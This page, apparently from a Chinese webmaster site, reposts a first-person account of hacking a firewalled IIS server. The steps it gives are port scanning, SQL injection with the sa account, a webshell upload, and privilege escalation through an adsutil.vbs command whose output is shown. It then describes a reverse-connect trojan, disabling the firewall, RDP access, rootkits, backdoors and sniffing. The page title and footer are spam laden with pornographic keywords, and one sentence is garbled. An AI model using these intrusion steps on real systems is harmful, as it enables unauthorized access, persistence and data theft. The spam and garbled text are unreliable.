青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網

17站長網 首頁 安全 入侵防御 查看內容

服務器系統有防火墻的網站入侵過程

2022-9-26 10:54| 查看: 2358 |來源: 互聯網

一、踩點 ping www.111.com 發現超時,可以是有防火墻或做了策略。再用superscan掃一下,發現開放的端口有很多個,初步估計是軟件防火墻。 二、注入 從源文件里搜索關鍵字asp,找到了一個注入點。用nbsi注
一、踩點

ping www.111.com 發現超時,可以是有防火墻或做了策略。再用superscan掃一下,發現開放的端口有很多個,初步估計是軟件防火墻。

二、注入

從源文件里搜索關鍵字asp,找到了一個注入點。用nbsi注入,發現是sa口令登陸,去加了一個用戶,顯示命令完成。哈哈,看來管理員太粗心了。先上傳一個webshell,上傳了一個老兵的asp木馬。接下來的就是個人習慣了,我平時入侵的習慣是先上傳webshell,然后再把webshell提升為system權限。因為這樣說可以說在入侵之時會非常的方便,我個人覺得這個方法非常好。

三、提升權限

先看哪些特權的:

cs cript C:\Inetpub\AdminS cripts\adsutil.vbs get /W3SVC/InProcessIsapiApps

得到:

Microsoft (R) Windows 腳本宿主版本 5.1 for Windows

版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps : (LIST) (5 Items)

"C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll"

"C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll"

"C:\WINNT\system32\msw3prt.dll"

把asp.dll加進去:

cs cript C:\Inetpub\AdminS cripts\adsutil.vbs

set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32

\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32

\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"

然后用asp木馬加個用戶,顯示命令完成。

四、TerminalService

接下來就是開3389了,用net start顯示,發現已開了TS服務,但端口上沒有3389,覺得可能是改端口了。但事實上它們欺騙我的感情,我用netstat -an察看了一下,發現有3389,再從net start 里發現是對方的防火墻搞的鬼。算了,上傳個木馬吧,上傳了一個改了特征碼的20CN反彈木馬,然后用木馬在GUI下關掉了防火墻,再用3389登陸器登了上去,這里我這樣做是因為我知道管理員一定不會在旁邊。而對于這個時候,比較老道的方法大家可以用fpipe實現端口重定向,或者用httptunnel。和黑防里面說的那樣,不過我試過沒有成功過一次,而且我在收集資料里看到黑防的那篇和另外一個高手寫的一模一樣,不知道誰抄誰。還有一種工具是despoxy,(TCP tunnel for HTTP Proxies)大家有興趣的話可以去試一下,它可以穿透http代理。

五、簡單后門

1.改了FSO名,這樣是讓我自己享受,這個有system權限的馬兒。

2.放了幾個rootkit和幾個網絡上少見的后臺。

3.我個從是不喜歡多放后臺,覺得很煩。

六、Sniffer

1.TS界面下,下載了些嗅探器。先ARPsniffer圖形的看了一下,暈死,沒有一臺內網機子。又看了一個外網,暈死,整個IP段都是�?磥砦业倪\行不錯嘛,打開webdavscan查了一下,只有兩三個IP是網站,而且是很小型的,接下來就沒有什么動力了。
本文最后更新于 2022-9-26 10:54,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:[email protected]
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

下一篇:dcomrpc入侵 上一篇:RPC漏洞入侵

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 伦理片 a在线线版韩国 | 办公室丝袜老师在线观看 | 国产国拍亚洲精品永久软件 | 不卡无线在一二三区 | 亚洲国产中文字幕在线视频 | 女人麻豆国产香蕉久久精品 | 91精品国产免费入口 | 久久久久婷婷国产综合青草 | 我与旗袍老师疯狂床震 | 免费人妻无码AV不卡在线 | 亚洲午夜电影 | 黄色a三级免费看 | 亚洲三级在线看 | 亚洲嫩草影院久久精品 | 国产精品免费一区二区三区四区 | 中国农民真实bbwbbw | 国产深夜福利视频在线 | 韩国伦理三级 | 亚洲人成在线观看一区二区 | https黄视| 国产午夜精品鲁丝片 | 色欲天天天综合网免费 | 精品四虎国产在免费观看 | 亚洲中文字幕在线精品 | 欧美午夜精品一区区电影 | 成年妇女免费播放 | 午夜AV亚洲一码二中文字幕青青 | 动漫美女脱小内内露尿口 | 国产色婷婷亚洲99精品 | 日韩免费一区二区三区在线 | 在线视频 日韩视频二区 | 交换年轻夫妇HD中文字幕 | 奶头从情趣内衣下露了出来AV | 黄片在线观看 | 亚洲欧美一区二区三区蜜芽 | 日本人吃奶玩奶虐乳 | 色欲av蜜臀av高清 | 夜色私人影院永久入口 | 国产精品亚洲电影久久成人影院 | CHINA篮球体育飞机2022网站 | 小鸟酱喷水 |